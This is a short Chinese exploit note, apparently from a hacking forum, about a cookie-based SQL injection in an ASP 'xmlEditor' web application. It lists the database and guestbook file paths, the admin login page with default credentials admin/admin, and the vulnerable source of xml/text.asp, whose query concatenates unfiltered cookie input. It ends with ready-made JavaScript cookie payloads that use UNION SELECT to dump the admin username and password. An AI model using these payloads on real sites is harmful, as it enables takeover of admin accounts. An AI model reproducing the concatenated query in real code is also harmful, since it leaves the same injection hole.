数据库地址:xmlEditor/database/####@@@datas.mdb

后台  xmleditor/login.asp   admin/admin

留言数据库:guestbook/db/sywl.asp

cookie注入漏漏洞文件:

xml/text.asp

代码:

——————————————————————————

<!–#include file=”../conn.asp”–>  //包含过滤的get和post的文件,但是忽略了cookie

<%

flowNo = Request(“flowNo”)    //Request获取可不只get和post噢~~!

if flowNo <> “” then        //flowNo如果是不等于空就往下执行~!

set rs=server.CreateObject(“ADODB.RecordSet”)

rs.Source=”select * from xmlContent where flowNo=”&flowNo

rs.Open rs.Source,conn,1,1

//xml语法,爆出的信息就出现在title里面~!

Response.Write “<?xml version=’1.0′ encoding=’utf-8′?>”&chr(13)

Response.Write “<main>” & chr(13)

Response.Write “<title><![CDATA["

Response.Write rs("tx")

Response.Write "]]></title>”& chr(13)

Response.Write “<text><![CDATA["

Response.Write rs("description")

Response.Write "]]></text>”& chr(13)

rs.Close

Set rs=nothing

conn.Close

Set conn=nothing

Response.Write “</main>”

end if

%>

其实这个cookie注入漏洞在根目录new.asp文件也存在,只是利用不方便,而且有自定义跳转首页==~!但是在text.asp这个文件里面根本没加什么跳转之类的,所以利用方便的~!

EXP:

javascript:alert(document.cookie=”flowNo=”+escape(“14 union select 1,2,3,adminname from XmlAdmin”));

javascript:alert(document.cookie=”flowNo=”+escape(“14 union select 1,2,3,adminpwd from XmlAdmin”));

PS:注意此EXP漏洞出现的地方不是在页面中噢,页面中是空白的,爆出的帐号和密码是出现在title也就是标题中的~! 请大家仔细注意观察噢~!